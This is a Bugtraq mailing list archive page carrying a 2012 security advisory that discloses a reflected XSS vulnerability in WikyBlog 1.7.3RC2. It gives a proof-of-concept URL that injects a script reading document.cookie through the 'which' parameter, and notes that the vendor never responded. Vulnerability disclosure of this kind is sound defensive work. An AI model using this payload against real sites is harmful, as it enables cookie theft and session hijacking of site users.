Home page logo
/

bugtraq logo Bugtraq mailing list archives

WikyBlog 1.7.3RC2 XSS vulnerability
From: sschurtz () darksecurity de
Date: Thu, 15 Mar 2012 17:31:41 GMT

Advisory:               WikyBlog 1.7.3RC2 XSS vulnerability
Advisory ID:            SSCHADV2012-006
Author:                 Stefan Schurtz
Affected Software:      Successfully tested on WikyBlog 1.7.3RC2
Vendor URL:             http://www.wikyblog.com/
Vendor Status:          informed

==========================
Vulnerability Description
==========================

WikyBlog 1.7.3RC2 is prone to a XSS vulnerability

==================
PoC-Exploit
==================

http://[target]/WikyBlog-1.7.3rc2/index.php/Special/Main/Templates?cmd=copy&which='";<script>alert(document.cookie)</script>

=========
Solution
=========

-

====================
Disclosure Timeline
====================

25-Feb-2012 - vendor informed
15-Mar-2012 - no response from vendor

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-006.txt


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]